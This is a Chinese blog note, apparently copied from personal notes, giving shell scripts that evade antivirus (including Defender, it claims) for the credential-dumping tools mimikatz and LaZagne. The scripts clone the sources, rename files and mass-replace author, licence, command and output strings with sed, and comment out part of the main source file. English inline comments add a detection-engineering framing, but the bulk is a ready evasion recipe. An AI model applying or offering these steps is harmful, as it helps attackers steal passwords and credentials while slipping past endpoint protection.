  • 关于mimikatz lazagne免杀方法

    其实现在的杀软还是玩的老一套,改改特征字符就能过了,最新的defender能用这个方法过

    文章直接从笔记复制出来的,有需要的自己看情况用

    # NOTE(review): unpinned clone of the upstream repository (no tag or commit
    # given), so the tree being edited is whatever HEAD is when this is run.
    git clone https://github.com/gentilkiwi/mimikatz.git lmmg
    mv lmmg/mimikatz lmmg/lmmg
    # Rename files whose names contain "mimikatz", then "kiwi": find is piped
    # into a read loop and the rewritten path is handed to mv.
    find lmmg/ -type f -name '*mimikatz*' | while read FILE ; do
            newfile="$(echo ${FILE} |sed -e 's/mimikatz/windows/g')";
            mv "${FILE}" "${newfile}";
    done
    find lmmg/ -type f -name '*kiwi*' | while read FILE ; do
            newfile="$(echo ${FILE} |sed -e 's/kiwi/onedrive/g')";
            mv "${FILE}" "${newfile}";
    done
    # Bulk in-place substitutions (GNU `sed -i`) over every regular file in
    # the tree: project name, author, e-mail and licence strings, then a few
    # command/identifier strings. Defender note: each of these is a purely
    # textual rename applied consistently across the sources; the page's own
    # claim is that this defeats string-based signatures, which is the point
    # for detection engineering -- rules keyed on these literals are brittle,
    # behaviour-based telemetry is not affected by them.
    find lmmg/ -type f -print0 | xargs -0 sed -i 's/mimikatz/windows/g'
    find lmmg/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/WINDOWS/g'
    find lmmg/ -type f -print0 | xargs -0 sed -i 's/Mimikatz/Windows/g'
    find lmmg/ -type f -print0 | xargs -0 sed -i 's/DELPY/gweep/g'
    find lmmg/ -type f -print0 | xargs -0 sed -i 's/Benjamin/gweeperx/g'
    find lmmg/ -type f -print0 | xargs -0 sed -i 's/benjamin@gentilkiwi.com/@gweeperx/g'
    find lmmg/ -type f -print0 | xargs -0 sed -i 's/creativecommons/notcommons/g'
    find lmmg/ -type f -print0 | xargs -0 sed -i 's/gentilkiwi/MSOffice/g'
    find lmmg/ -type f -print0 | xargs -0 sed -i 's/KIWI/ONEDRIVE/g'
    find lmmg/ -type f -print0 | xargs -0 sed -i 's/Kiwi/Onedrive/g'
    find lmmg/ -type f -print0 | xargs -0 sed -i 's/kiwi/onedrive/g'
    # The next four rewrite strings that are visible at runtime (command and
    # identifier names), so the program's user-facing strings differ after
    # this; the control flow of the sources is not touched by a textual
    # rename -- presumably, assuming each string is renamed everywhere.
    find lmmg/ -type f -print0 | xargs -0 sed -i 's/DumpCreds/DumpCred/g'
    find lmmg/ -type f -print0 | xargs -0 sed -i 's/logonPasswords/logonPassword/g'
    find lmmg/ -type f -print0 | xargs -0 sed -i 's/ArgumentPtr/NotTodayPal/g'
    find lmmg/ -type f -print0 | xargs -0 sed -i 's/CallDllMainSC1/ThisIsNotTheStringYouAreLookingFor/g' 
    
    cd ./lmmg/lmmg/
    # Both sed scripts below edit windows.c in place (presumably the renamed
    # mimikatz.c) using GNU-sed `0,/pat/` range addresses: `0,/pat/!` skips
    # everything up to and including the first match, so the substitution is
    # applied to a later occurrence (the second `#if !defined(_POWERKATZ)`,
    # the third `#endif`), inserting `/*` before one and `*/` after the other.
    # Each double-quoted script deliberately spans two page lines because the
    # replacement contains a literal newline; whether sed accepts that
    # unescaped newline as pasted is not verifiable from here -- confirm.
    sed -i "0,/#if !defined(_POWERKATZ)/! {0,/#if !defined(_POWERKATZ)/ s/#if !defined(_POWERKATZ)//*
    #if !defined(_POWERKATZ)/}" windows.c
    sed -i "0,/#endif/! {0,/#endif/! {0,/#endif/ s/#endif/#endif
    *//}}" windows.c
    
    lazagne
    # NOTE(review): this section assumes the current directory holds a
    # LaZagne checkout with a Windows/ subtree; the clone step is not shown
    # on the page. Same pattern as the mimikatz section: rename files and
    # directories whose names contain the project name in its three spellings
    # (lazagne / LaZagne / laZagne), via find piped into a read loop.
    find ./Windows/ -type f -name '*lazagne*' | while read FILE ; do
            newfile="$(echo ${FILE} |sed -e 's/lazagne/kmm/g')";
            mv "${FILE}" "${newfile}";
    done
    
    find ./Windows/ -type d -name '*lazagne*' | while read FILE ; do
            newfile="$(echo ${FILE} |sed -e 's/lazagne/kmm/g')";
            mv "${FILE}" "${newfile}";
    done
    
    find ./Windows/ -type f -name '*LaZagne*' | while read FILE ; do
            newfile="$(echo ${FILE} |sed -e 's/LaZagne/Kmm/g')";
            mv "${FILE}" "${newfile}";
    done
    
    find ./Windows/ -type d -name '*LaZagne*' | while read FILE ; do
            newfile="$(echo ${FILE} |sed -e 's/LaZagne/Kmm/g')";
            mv "${FILE}" "${newfile}";
    done
    find ./Windows/ -type f -name '*laZagne*' | while read FILE ; do
            newfile="$(echo ${FILE} |sed -e 's/laZagne/KMm/g')";
            mv "${FILE}" "${newfile}";
    done
    
    find ./Windows/ -type d -name '*laZagne*' | while read FILE ; do
            newfile="$(echo ${FILE} |sed -e 's/laZagne/KMm/g')";
            mv "${FILE}" "${newfile}";
    done
    
    # In-place content substitution of the project name in all three spellings
    # (note the path here is written `windows/`, lower-case, unlike the
    # `./Windows/` used for the renames above -- taken as given from the page).
    find windows/ -type f -print0 | xargs -0 sed -i 's/lazagne/kmm/g'
    find windows/ -type f -print0 | xargs -0 sed -i 's/LaZagne/Kmm/g'
    find windows/ -type f -print0 | xargs -0 sed -i 's/laZagne/KMm/g'
    
    # These replace the tool's console-output markers (banners, separators,
    # "Password not found", the -v hint) with short tokens. Defender note:
    # these are exactly the kind of literal output strings a string-only rule
    # would key on; the substitution changes what is printed, not what the
    # program does, which is why detection should not rest on them alone.
    find windows/ -type f -print0 | xargs -0 sed -i 's/BANG/bg/g'
    find windows/ -type f -print0 | xargs -0 sed -i 's/passwords ---------------/vp/g'
    find windows/ -type f -print0 | xargs -0 sed -i 's/Password not found/nop/g'
    find windows/ -type f -print0 | xargs -0 sed -i 's/=================================================================/ll/g'
    find windows/ -type f -print0 | xargs -0 sed -i 's/########## User/lp/g'
    find windows/ -type f -print0 | xargs -0 sed -i 's/For more information launch it again with the -v option/jj/g'
  • 原文地址:https://www.cnblogs.com/junmoxiao/p/11774748.html